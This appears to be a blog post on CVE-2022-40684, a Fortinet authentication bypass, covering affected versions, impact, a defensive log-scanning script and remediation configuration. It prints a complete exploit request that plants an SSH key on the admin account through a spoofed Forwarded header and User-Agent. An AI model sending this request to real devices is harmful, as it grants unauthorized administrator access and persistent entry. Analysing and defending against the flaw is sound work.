CVE-2022-40684
About The Vulnerability
CVE-2022-40684 is an authentication bypass vulnerability in several Fortinet products: FortiOS, FortiProxy and FortiSwitchManager. Using this vulnerability, an attacker can bypass authentication and log in as an administrator. Its CVSS base score is 9.8, making it critical. Before moving further, let's understand what these products are:
- FortiOS: As the name suggests, FortiOS, the Fortinet network operating system, is the heart of Fortinet security. This operating system is at the core of the Security Fabric and ties all components together to ensure tight integration across an organization's entire deployment.
- FortiProxy: A secure web proxy that protects employees against internet-borne attacks by incorporating multiple detection techniques such as web filtering.
- FortiSwitchManager (FSWM): The on-premise management platform for the FortiSwitch product. FortiSwitch units connect to FortiSwitchManager over the layer-3 network. You can configure a large number of FortiSwitch units with this FortiSwitch-management-only platform.
Products affected by this CVE
- FortiOS versions 7.2.0-7.2.1 and 7.0.0-7.0.6
- FortiProxy versions 7.0.0-7.0.6 and 7.2.0
- FortiSwitchManager versions 7.0.0 and 7.2.0
Impact
The bug allows an unauthenticated user to perform operations directly on the admin panel via HTTP/S requests (GET, POST, DELETE, etc.). Holding the administrator role can lead to the following:
- Taking control of the entire application
- Gaining access to the internal infrastructure
- Adding or deleting users
- Exposure of sensitive data
- Modifying the admin users' SSH keys so the attacker can log in to the compromised system
- Tampering with configuration files, etc.
As an example, the following HTTP PUT request adds a new SSH public key to the admin account, letting the attacker SSH into the affected system as administrator:

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: 10.0.40.67
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";
Content-Length: 612

{
  "ssh-public-key1": "\"ssh-rsa ... dev@devs-MacBook-Pro.local\""
}

- Using the Forwarded header, an attacker is able to set client_ip to "127.0.0.1".
- The "trusted access" authentication check verifies that client_ip is "127.0.0.1" and the User-Agent is "Report Runner", both of which are under attacker control.
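As an added example (not part of the original post), the following Python script shows how a defender could hunt for the request pattern just described in access logs from a reverse proxy or web server placed in front of the management interface: a Forwarded header that claims a loopback client and/or the "Report Runner" User-Agent on a /api/v2/ path. The tab-separated log format and the log lines are constructed for this example; real device logs need their own parser.

```python
import ipaddress
import re

# Constructed sample log (not from a real device). Tab-separated fields:
# timestamp, client IP, method, path, User-Agent, Forwarded header ("-" if absent).
SAMPLE_LOG = """\
2022-10-13T10:01:02Z\t198.51.100.7\tPUT\t/api/v2/cmdb/system/admin/admin\tReport Runner\tfor="[127.0.0.1]:8000";by="[127.0.0.1]:9000";
2022-10-13T10:01:05Z\t203.0.113.5\tGET\t/api/v2/cmdb/system/global\tMozilla/5.0\t-
2022-10-13T10:02:10Z\t198.51.100.7\tGET\t/api/v2/monitor/system/status\tReport Runner\t-
2022-10-13T10:03:44Z\t192.0.2.9\tDELETE\t/api/v2/cmdb/system/admin/backup\tcurl/7.85.0\tfor=[::1]:4430
2022-10-13T10:04:00Z\t203.0.113.5\tGET\t/login\tMozilla/5.0\tfor=203.0.113.5
"""

def forwarded_for_ips(header: str) -> list[str]:
    """Extract every 'for=' node from an RFC 7239 Forwarded header value
    (quoted values, bracketed IPv6/IPv4 forms and trailing ports are handled)."""
    ips = []
    for raw in re.findall(r'for=([^;,]+)', header, re.IGNORECASE):
        node = raw.strip().strip('"')
        if node.startswith('['):            # "[127.0.0.1]:8000" or "[::1]:4430"
            node = node[1:node.index(']')]
        elif node.count(':') == 1:          # bare IPv4 with a port
            node = node.split(':')[0]
        ips.append(node)
    return ips

def is_loopback(node: str) -> bool:
    """True only for a parseable loopback address (127.0.0.0/8 or ::1)."""
    try:
        return ipaddress.ip_address(node).is_loopback
    except ValueError:                      # obfuscated tokens such as "_hidden"
        return False

def scan(log_text: str) -> list[dict]:
    """Flag REST API requests carrying the bypass indicators described above:
    a Forwarded header naming a loopback client and/or the 'Report Runner' UA."""
    findings = []
    for line in log_text.splitlines():
        ts, src, method, path, ua, fwd = line.split('\t')
        if not path.startswith('/api/v2/'):
            continue                        # only the management REST API matters here
        reasons = []
        if fwd != '-' and any(is_loopback(ip) for ip in forwarded_for_ips(fwd)):
            reasons.append('forwarded-loopback')
        if ua == 'Report Runner':
            reasons.append('report-runner-ua')
        if reasons:                         # both indicators together is the strongest signal
            findings.append({'ts': ts, 'src': src, 'method': method, 'path': path,
                             'severity': 'high' if len(reasons) == 2 else 'medium',
                             'reasons': ','.join(reasons)})
    return findings
```

Any "high" finding against /api/v2/cmdb/system/admin/ deserves an immediate review of the admin accounts' SSH keys and of any configuration changes made around that timestamp.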
Remediation
“Finding remedy is way more important than finding a fault”
The following are some remediations to protect an organization from CVE-2022-40684:
- Upgrade the impacted products:
  Upgrade FortiOS to 7.2.2 or later (7.2 branch) or 7.0.7 or later (7.0 branch)
  Upgrade FortiProxy to 7.2.1 or later (7.2 branch) or 7.0.7 or later (7.0 branch)
  Upgrade FortiSwitchManager to 7.2.1 or later (7.2 branch) or 7.0.1 or later (7.0 branch)
- Disable the HTTP/HTTPS administrative interface on FortiOS, FortiProxy and FortiSwitchManager.
- For FortiOS, limit the IP addresses that can reach the administrative interface:
  config firewall address
      edit "my_allowed_addresses"
          set subnet <MY IP> <MY SUBNET>
  end
  Then create an address group:
  config firewall addrgrp
      edit "MGMT_IPs"
          set member "my_allowed_addresses"
  end
  Create the local-in policy to restrict access to the predefined group on the management interface (here: port1):
  config firewall local-in-policy
      edit 1
          set intf port1
          set srcaddr "MGMT_IPs"
          set dstaddr "all"
          set action accept
          set service HTTPS HTTP
          set schedule "always"
          set status enable
      next
      edit 2
          set intf "any"
          set srcaddr "all"
          set dstaddr "all"
          set action deny
          set service HTTPS HTTP
          set schedule "always"
          set status enable
  end
  If using non-default ports, create the appropriate service objects for GUI administrative access:
  config firewall service custom
      edit GUI_HTTPS
          set tcp-portrange <admin-sport>
      next
      edit GUI_HTTP
          set tcp-portrange <admin-port>
  end
  Use these objects instead of "HTTPS HTTP" in local-in policies 1 and 2 above.
- For FortiProxy, limit the IP addresses that can reach the administrative interface (here: port1):
  config system interface
      edit port1
          set dedicated-to management
          set trust-ip-1 <MY IP> <MY SUBNET>
  end
This brings us to the end. I hope you liked this blog; if I was mistaken at any part, feel free to comment, as I am also learning. Do share it with people in your network.